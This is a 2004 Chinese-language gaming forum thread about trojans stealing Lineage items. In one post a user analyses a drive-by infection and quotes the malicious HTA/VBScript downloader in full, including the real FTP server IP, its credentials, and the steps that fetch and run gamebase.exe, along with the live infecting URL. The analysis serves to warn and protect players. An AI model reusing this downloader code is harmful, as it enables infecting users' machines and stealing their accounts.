鐵之狂傲»論壇 › 線上遊戲 › 天堂 › 木馬

最後更新

123 / 3 頁下一頁

樓主: salanieyou

木馬

[複製連結] 檢視: 1867|回覆: 22

霸子

無名的居民

11^#

發表於 04-7-21 20:54:04 |只看該作者大字中字小字正體化简体化載入全部圖片

回覆: 木馬

昨天一點多玩無介突然全身沒裝備...
在家玩也沒用外掛也被清空....
有何天理呀..

回覆使用道具檢舉

極度黑暗

名望的鄉紳

12^#

發表於 04-7-21 22:47:32 |只看該作者大字中字小字正體化简体化載入全部圖片

回覆: 木馬

謝謝
你真屌
我看你可以請武大大幫你開個專區(名稱:木馬終結)

[CODE] [size=4][url="https://www.gamez.com.tw/showthread.php?p=1218742#post1218742"][color=red]吾是黑暗[/color][/url][color=red]:大笑: [/color][/size] [size=4][url="https://www.gamez.com.tw/showthread.php?p=1218742#post1218742"][color=red]吾所做之事是破壞跟毀滅[/color][/url][color=red]:邪惡: [/color][/size] [size=4][url="https://www.gamez.com.tw/showthread.php?p=1218742#post1218742"][color=red]吾所唱之歌是痛苦之歌[/color][/url][color=red]:邪惡: [/color][/size] [size=4][url="https://www.gamez.com.tw/showthread.php?p=1218742#post1218742"][color=red]吾所前往之處是虛無之地[/color][/url][color=red]:邪惡: [/color][/size] [size=4][url="https://www.gamez.com.tw/showthread.php?p=1218742#post1218742"][color=red]吾之志願是絕對的破壞[/color][/url][color=red]:邪惡: [/color][/size] [color=red][/CODE][/color]

回覆使用道具檢舉

Hanneber

一般的勇者

13^#

發表於 04-7-22 08:29:45 |只看該作者大字中字小字正體化简体化載入全部圖片

回覆: 木馬

[QUOTE=salanieyou]裡面沒有清SmcSVR.exe這隻的教學@@[/QUOTE]

仔細想想.我回覆好像回錯了說@@""...綠色的字是防毒軟體的程式.並不是木馬的檔案.所以請

找到你有的防毒軟體.依照她的說明步驟來做吧!!!

如果有回鍋或不當發言的情形.請轉告.魚頭儘快修正或刪除.謝謝~

蒐集鐵傲眾名單中!願意給Msn~都可以傳悄悄話喔!

笨魚頭の『新BLOG 』　『散文小品』

回覆使用道具檢舉

Hanneber

一般的勇者

14^#

發表於 04-7-22 10:26:26 |只看該作者大字中字小字正體化简体化載入全部圖片

回覆: 木馬

廢話補充在一篇~"~

最近木馬橫行，我的朋友已經兩個人中獎被盜了；由於工作是MIS自己也粉好奇。於是，請朋友把檔案傳給我；並且上網爬文實測出下列結果；供大家參考一下。

大致上是上過某個被入侵的網站，而那個網頁被植入一段程式，不管是下載檔案或是點某個超連結後，那個超連結會執行一段小程式，FTP至大陸網站下載gamebase.exe的檔案到電腦的C:\；這個時候還不會有事。

然後，會自動執行gamebase.exe 在C:\windows的目錄下產生Smcsvr.exe 的檔案，並且更改機碼，就算是重新開機也能自動執行，再來當然就是等受害者上當;，再把竊取的資料傳回去。
測試過程如下：我的電腦是Windows Xp+IE6.01Sp1；所有修正程式都修到最新的。公司的防毒軟體是 Officescan5.5，病毒碼943，當IE 連到"http://zhu.7xi.org/gamebase/ng.test"時，會出現開啟或是儲存的選項(像是下載東西)。***這段過程如果植入網頁執行，一般人根本不會察覺。

選擇儲存的話會下載ng.hta 的檔案；沒事，安全 ^^Y。
選擇開啟的話；恭喜！中標了！ > <" 。在C:\會產生gamebase.exe 的檔案，手動執行他就會"進化"出 smcsvr.exe 的檔案並且更改機碼。
當時IE的安全性設定是預設(一般人大概不會改，甚至連改它做啥都不知道吧)；而防毒軟體完全沒反映，難怪一堆人會中獎。後來去下載江民2004來裝，一連到上面那個網頁就出警訊了，請朋友幫忙測，他的NORTON2004 也說有擋到。再來是關掉江民防毒軟體，執行smcsvr.exe，讓它長駐執行；然後連到SYMANTEC 去做線上掃毒也有掃到；去趨勢下載 tsc.exe 掃木馬專用的，居然沒
掃到 @@"。

PS："http://zhu.7xi.org/gamebase/ng.test" 的連結來自某L牌討論區，藍瞳大大所提出的。江民防毒軟體是參考雄x網頁所寫的資料來測試(不要誤會，不是宣揚外掛，爬文找資料而已，善用google可以找到粉多東西的)。病毒樣本及網址我已經傳給在趨勢工作的朋友了，他說傳去菲律賓了，希望趕快出新病毒碼，畢竟我是趨勢的愛用者。那個網址的惡意執行碼如下，供大家參考

et fs = CreateObject("Scripting.FileSystemObject")
Set t = fs.CreateTextFile("163.txt",True)
t.WriteLine("open 61.163.238.51")→*ftp連到這個地方*
t.WriteLine("nh")**ftp 的 user name**
t.WriteLine("nh")**ftp 的 password**
t.WriteLine("lcd c:\")
t.WriteLine("bin")
t.WriteLine("get gamebase.exe")**下載gamebase.exe**
t.WriteLine("bye")
t.Close
wsh.Run "ftp -s:163.txt",0,true
wsh.Run "c:\gamebase.exe" **執行gamebase.exe**
fs.DeleteFile "163.txt",true
window.close

寫到這裡就有氣！看到那些說明，還會幫客戶找為啥會中毒，以及解決方法。人家的外掛都會搶登將對方踢下線，而守法玩家中木馬被盜者只能眼睜睜看自己被擠出去，花了3、4分鐘才能連到連線密碼更改網頁，早就被清光了......

至於解決方法，之前粉多文章討論過ㄌ就不再多說了，目前我保護自己的方式是玩遊戲前後，都會開啟工作管理員看有沒有不該有的程式在執行，畢竟當新的木馬出來後，現有的防護措施不見得擋的到，自求多福嚕。

轉載至巴哈姆特

回覆使用道具檢舉

@冬眠滴牛@

無名的勇者

天堂版甜不辣帝王

15^#

發表於 04-7-22 21:47:38 |只看該作者大字中字小字正體化简体化載入全部圖片

回覆: 木馬

感謝熱心發帖^^
也感謝您的教學
聲望等能補再補吧XD

年復一年此畫中，桃花倒影相映紅，
畫中倒影何處去，桃花依舊笑春風。

回覆使用道具檢舉

追尋夢想

一般的居民

16^#

發表於 04-7-22 23:03:55 |只看該作者大字中字小字正體化简体化載入全部圖片

回覆: 木馬

[QUOTE=salanieyou]就在剛剛我上限的時候裝備都不見了
對方只拿裝備...

能問一下各位...我要怎摩掃看看有沒有木馬><....

我沒有用雄霸...
沒用任何變身檔...[/QUOTE]
要找木馬非常簡單
首先~
妳先把全身最貴重的物品放在某一個帳號
隻後看看會不會被盜就知道有沒有木馬了
我都是這樣測試的喔